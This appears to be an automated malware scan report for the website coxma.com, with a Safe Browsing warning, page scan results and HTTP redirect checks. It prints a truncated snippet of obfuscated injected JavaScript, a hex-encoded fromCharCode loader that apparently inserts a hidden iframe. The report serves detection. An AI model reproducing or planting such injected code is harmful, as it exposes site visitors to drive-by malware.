Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=coxma.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://coxma.com/ | 200 OK Content-Length: 12692 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jsnamo="fr"+"omCh"+"ar"+"Co"+"de";if(document.querySelector)gmtq=4;qkpcwo=("4b,91,a0,99,8e,9f,94,9a,99,4b,97,9d,93,5b,64,53,54,4b,a6,38,35,4b,a1,8c,9d,4b,9e,9f,8c,9f,94,8e,68,52,8c,95,8c,a3,52,66,38,35,4b,a1,8c,9d,4b,8e,9a,99,9f,9d,9a,97,97,90,9d,68,52,94,99,8f,90,a3,59,9b,93,9b,52,66,38,35,4b,a1,8c,9d,4b,97,9d,93,4b,68,4b,8f,9a,8e,a0,98,90,99,9f,59,8e,9d,90,8c,9f,90,70,97,90,98,90,99,9f,53,52,94,91,9d,8c,98,90,52,54,66,38,35,38,35,4b,97,9d,93,59,9e,9d,8e,4b,68,4b,52,93,9f,9f,9b,65,5a,5a,a2,a2,a Antivirus reports:
| ||
http://coxma.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: coxma.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 20 Jan 2015 06:32:33 GMT
Server: Apache
Content-Language: it
Content-Type: text/html
X-Powered-By: PHP/5.2.6-1+lenny9
GET / HTTP/1.1
Host: coxma.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 20 Jan 2015 06:32:33 GMT
Server: Apache
Content-Language: it
Content-Type: text/html
X-Powered-By: PHP/5.2.6-1+lenny9
Second query (visit from search engine):
GET / HTTP/1.1
Host: coxma.com
Referer: http://www.google.com/search?q=coxma.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: coxma.com
Referer: http://www.google.com/search?q=coxma.com
Result:
The result is similar to the first query. There are no suspicious redirects found.